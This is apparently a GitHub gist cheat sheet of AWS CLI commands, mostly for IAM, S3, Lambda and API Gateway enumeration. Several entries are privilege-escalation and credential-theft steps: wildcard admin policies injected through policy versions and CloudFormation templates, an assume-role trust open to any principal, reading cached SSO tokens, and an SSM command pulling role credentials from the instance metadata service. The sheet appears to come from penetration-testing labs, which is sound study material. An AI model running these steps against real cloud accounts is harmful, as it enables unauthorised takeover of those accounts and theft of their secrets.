-
Export credentials to be imported in environment shell:
aws configure export-credentials --profile default --format env
-
List all user in the organization:
aws iam list-users
-
List all UserName in the organization:
aws iam list-users | ConvertFrom-Json | select -expand Users | select UserName
-
List groups
aws iam list-groups
-
List groups for a user
aws iam list-groups-for-user --user-name admin
-
List all inline policies for a user
aws iam list-user-policies --user-name admin
-
List attached policy for a user
aws iam list-attached-user-policies --user-name admin
-
Get the credential report for organization users (and
root
user)aws iam get-credential-report --output json | jq -r .Content | base64 -d
-
List user certificates
aws iam list-signing-certificates --user-name ad-user
-
Update user's access key
aws iam update-access-key --access-key-id FICACULOTETTE --status Active
-
List user SSH public keys
aws iam list-ssh-public-keys --user-name ad-user
-
Download the user SSH public keys
aws iam get-ssh-public-key --user-name ad-user --encoding PEM --ssh-public-key ID <ID>
-
Get the access token for SSO login:
cat ~/.aws/sso/cache/<GUID>.json | jq -r .accessToken
-
Use the access token to get a temporary session token
aws sso get-role-credentials --role-name SECRO --account-id 00111111111 --access-token eyJlbmMiOiJBMjU2R0NNIiwidGFnIjoic0pI...
-
List hardware MFA devices of the current user
aws iam list-mfa-devices
-
List virtual MFA devices of the current user
aws iam list-virtual-mfa-devices
-
List inline policies for a group
aws iam list-group-policies --group-name admin
-
List attached policies for a group
aws list-attached-group-policies --group-name admin
-
Get policy information
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
-
Get policy content knowing the policy version:
aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --version-id v1
-
List all policies
aws iam list-policies
-
List role information
aws iam get-role --role-name ad-loggingrole
-
List inline policy for a role
aws iam list-role-policies --role-name ad-loggingrole
-
List attached policies for a role
aws iam list-attached-role-policies --role-name ad-loggingrole
-
Create a new role from command line:
aws iam create-role --role-name lab-enum --assume-role-policy-document file:///tmp/assume-role-doc.json
- Where
assume-role-doc.json
contains:{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "sts:AssumeRole", "Condition": {} } ] }
- Where
-
Assume a role:
aws sts assume-role --role-arn arn:aws:iam::00111111111:role/LoggingRole --role-session-name assumed
-
Get the information of the current user:
aws sts get-caller-identity
-
List all S3 buckets:
aws s3 ls
-
Attach a managed policy to a user:
aws iam attach-user-policy --user-name student --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
-
List the login profiles for a user:
aws iam get-login-profile --user-name BobAlice
-
Create a new login profile for a user
aws iam create-login-profile --user-name BobAlice --password '!QAZ2wsx' --no-password-reset-required
-
List all policies for a role:
aws iam get-role-policy --role-name Adder --policy-name AddUser
-
Add a user to a group:
aws iam add-user-to-group --group-name PrintGroup --user-name student
-
Attach a managed policy to a user:
aws iam attach-group-policy --group-name PrintGroup --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
-
Create a new policy:
aws iam create-policy-version --policy-arn arn:aws:iam::00111111111:policy/Print --policy-document file://a.json --set-as-default
- Where
a.json
contains:{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }
- Where
-
List all roles that matches a specified service:
aws iam list-roles | jq -r '.Roles[] | select( .AssumeRolePolicyDocument.Statement[].Principal.Service | contains("lambda"))'
-
Create a new Lambda function:
aws lambda create-function --function-name lambdaf --runtime python3.8 --zip-file fileb://lambdaf.zip --handler lambdaf.handler --role arn:aws:iam::00111111111:role/lab11lambdaiam
-
Execute the lambda function:
aws lambda invoke --function-name lambdaf output.txt
-
Get the latest AMI image for EC2 instance:
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
-
List the subnets for EC2 instances:
aws ec2 describe-subnets
-
List the security groups for VPCs:
aws ec2 describe-security-groups
-
List the instance profiles name:
aws iam list-instance-profiles
-
Create and start an EC2 instance:
aws ec2 run-instances --subnet-id subnet-00111111111 --image-id ami-00111111111 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-00111111111"
-
Execute a command inside an EC2 instance:
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role/"]' --targets "Key=instanceids,Values=i-00111111111" --comment "Retrieving Access Tokens"s
-
Retrieve the command of a command execute inside an EC2 instance:
aws ssm get-command-invocation --command-id 928226f8-2c17-4e66-9200-5bd921899996 --instance-id i-00111111111
-
Create a policy using CloudFormation stack:
aws cloudformation create-stack --stack-name ad-dodo --template-body file://n.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::00111111111:role/lab12CFDeployRole
- Where
n.json
contains:{ "Resources": { "EvilTemplate": { "Type": "AWS::IAM::Policy", "Properties": { "PolicyName": "admin_policy", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }, "Users": ["student"] } } } }
- Where
-
Update a CloudFormation stack to inject a malicious policy:
aws cloudformation update-stack --stack-name privesc --template-body file://privesc.yaml --capabilities CAPABILITY_NAMED_IAM --region eu-west-1
- Where
privesc.yaml
contains:Resources: PrivEscTemplate: Type: "AWS::IAM::ManagedPolicy" Properties: ManagedPolicyName: AdminAccessPolicy Description: Admin access to all AWS res Path: "/" PolicyDocument: Version: "2012-10-17" Statement: # allow all - Effect: Allow Action: - "*" Resource: "*" Roles: - RuoloCheFaCose
- Where
-
Get information on the CloudFormation stack status:
aws cloudformation describe-stacks --stack-name ad-dodo
-
List events of the CloudFormation stack:
aws cloudformation describe-stack-events --stack-name ad-dodo
-
List the API Gateway account (with quota):
aws apigateway get-account
-
List all configured REST APIs:
aws apigateway get-rest-apis
-
Enumerate the resources of a REST API:
aws apigateway get-resources --rest-api-id jojioijijoi
-
List the configuration for a single API call:
aws apigateway get-method --rest-api-id jojioijijoi --http-method GET --resource-id iouh789hi
-
List the authorizers used by an API::
aws apigateway get-authorizers --rest-api-id hiuh789hk
-
List the API keys:
aws apigateway get-api-keys
-
List GuardDuty detectors:
aws guardduty list-detectors
-
List GuardDuty filters:
aws guardduty list-filters --detector-id 1dd0e5bfc954bc46fe800952be7e2a69
-
Get the GuardDuty filter configuration:
aws guardduty get-filter --detector-id 1dd0e5bfc954bc46fe800952be7e2a69 --filter-name test-whitelist
-
List Lambda functions:
aws lambda list-functions
-
Get details of a Lambda function:
aws lambda get-function --function-name dictionary-attack
-
List Lambda function available layers:
aws lambda list-layers
-
Enumerate a specific Lambda layer:
aws lambda list-layer-versions --layer-name boto3-jinja
-
Enumerate a specific Lambda layer version:
aws lambda get-layer-version --layer-name boto3-jinja --version-number 1
-
List all the event sources for a Lambda function:
aws lambda list-event-source-mappings --function-name dictionary-attack
-
Dump the table of DynamoDB database:
aws dynamodb scan --table-name TABLE_NAME
-
Dump the content of a secret inside SecretManager:
aws secretmanager get-secret-value --secret-id MySecret
-
Anonymously enumerate S3 bucket:
aws s3 --no-sign-request --region ap-southeast-1 ls s3://bucket-name
-
Download a file from S3 bucket anonymously:
aws s3 --no-sign-request --region ap-southeast-1 cp s3://bucket-name/scripts/backup.sh /tmp/backup.sh
-
List objects inside a bucket:
aws s3api list-objects --bucket NomeBucket
-
Get bucket policy:
aws s3api get-bucket-policy --bucket NomeBucket | jq -r .Policy | jq
-
Get the bucket location:
aws s3api get-bucket-location --bucket data-extractor-repo
-
List object version:
aws s3api list-object-versions --bucket data-extractor-repo
-
Get the ACL of an object inside a bucket
aws s3api get-object-acl --bucket NomeBucket --key flag
-
Check the status of a bucket policy (if is present)
aws s3api get-bucket-policy-status --bucket bucket-code
-
List the bucket public access
aws s3api get-public-access-block --bucket bucket-code
-
List information about a EKS cluster
aws eks describe-cluster --name clusterName
Last active
September 8, 2023 20:31
-
-
Save notdodo/a00cb8911f04e5edc43fbb16c6f429dd to your computer and use it in GitHub Desktop.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment